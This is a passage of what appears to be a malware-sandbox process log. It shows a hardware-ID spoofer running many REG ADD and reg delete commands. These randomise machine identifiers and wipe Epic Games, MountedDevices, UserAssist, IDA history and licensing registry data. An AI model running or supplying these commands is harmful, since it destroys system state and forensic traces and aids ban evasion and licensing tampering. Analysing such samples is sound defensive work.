      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-250901713632761 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5980
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-25090-17136-32761278} /f
      4⤵
      Modifies registry key
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:364
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-25090-17136-32761278} /f
      4⤵
      Modifies registry key
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4584
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-25090-17136-32761278} /f
      4⤵
      Modifies registry key
      PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3404
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:5204
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      Modifies registry key
      PID:5756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:5488
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      Modifies registry key
      PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2476
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      Modifies registry key
      PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:5912
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      Modifies registry key
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3416
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:4632
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-25090-17136-32761278 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1284
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-25090-17136-32761278} /f
      4⤵
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5916
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-25090-17136-32761278} /f
      4⤵
      Modifies registry key
      PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1888
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-25090 /f
      4⤵
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:5216
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 25090 /f
      4⤵
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:3276
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 25090 /f
      4⤵
      Modifies registry key
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:4456
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-25090 /f
      4⤵
      Modifies registry key
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&1
    3⤵
    PID:4460
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple25090-17136-32761-2783586} /f
      4⤵
      Modifies registry key
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:3292
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple25090-17136-32761-2783586} /f
      4⤵
      PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:6052
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 25090 /f
      4⤵
      PID:6132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:5872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:5396
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 25093 /f
      4⤵
      Modifies registry key
      PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:3108
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 25093-27884-17857-24341 /f
      4⤵
      Modifies registry key
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
    3⤵
    PID:6060
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple25093-27884-17857-24341 /f
      4⤵
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f
    3⤵
    PID:1676
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple25093 /f
      4⤵
      Modifies registry key
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:1228
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 25093 /f
      4⤵
      Modifies registry key
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:2832
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 25093 /f
      4⤵
      Modifies registry key
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f
    3⤵
    PID:2620
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple25093-27884-17857-24341} /f
      4⤵
      PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:1452
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f
    3⤵
    PID:4564
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic Games /f
      4⤵
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
    3⤵
    PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
    3⤵
    PID:4780
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
      4⤵
      PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:4880
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 25093-27884-17857-2434113901 /f
      4⤵
      Modifies registry key
      PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:1580
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      Modifies registry key
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:4768
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      Modifies registry key
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:4924
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:5296
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:2980
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:4704
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:1576
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:396
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:5256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:4912
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:1800
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1976
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2260
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Modifies registry key
      PID:5580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3832
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:4524
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      Modifies registry key
      PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:4212
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1184
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:1288
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:940
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      Modifies registry key
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:3708
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:3564
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:3752
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4068
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 250932788417857243411390123291292222059428630127402428117774 /f
      4⤵
      Modifies registry class
      Modifies registry key
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2036
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3460
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:4008
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      Modifies registry key
      PID:364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:3544
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      Modifies registry key
      PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2132
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      PID:5204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2596
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-25093-27884-1785724341 /f
      4⤵
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:5820
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:5448
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      Modifies registry key
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:716
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      Modifies registry key
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:1360
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:6016
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      Modifies registry key
      PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:6064
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      Modifies registry key
      PID:5916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:1888
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
